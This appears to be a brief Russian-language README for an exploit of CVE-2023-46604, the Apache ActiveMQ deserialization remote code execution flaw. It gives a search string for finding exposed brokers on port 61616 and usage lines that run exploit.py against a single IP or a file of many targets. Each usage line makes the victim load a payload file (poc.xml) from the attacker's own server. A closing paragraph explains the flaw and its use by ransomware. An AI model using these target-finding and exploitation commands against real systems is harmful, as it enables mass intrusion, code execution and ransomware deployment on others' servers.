
Эксплойт для CVE-2023-46604
Эксплойт для CVE-2023-46604
product:"ActiveMQ" port:"61616"
for read targets from the file:
python3 exploit.py -f targets -c http://YourVPS/poc.xml
---
single target:
python3 exploit.py -ip IP -c http://YourVPS/poc.xml
CVE-2023-46604 — это критическая уязвимость удаленного выполнения кода в Apache ActiveMQ, программном обеспечении брокера сообщений с открытым исходным кодом. Эта уязвимость позволяет удаленному злоумышленнику, имеющему сетевой доступ к брокеру или клиенту OpenWire на основе Java, выполнять произвольные команды оболочки. Это достигается путем манипуляции типами сериализованных классов в протоколе OpenWire, что приводит к созданию брокером экземпляра любого класса из classpath. Уязвимость возникает из-за небезопасной десериализации в Apache ActiveMQ и была использована злоумышленниками, включая семейство программ-вымогателей HelloKitty, для запуска исполняемых файлов вымогателей и полного взлома систем.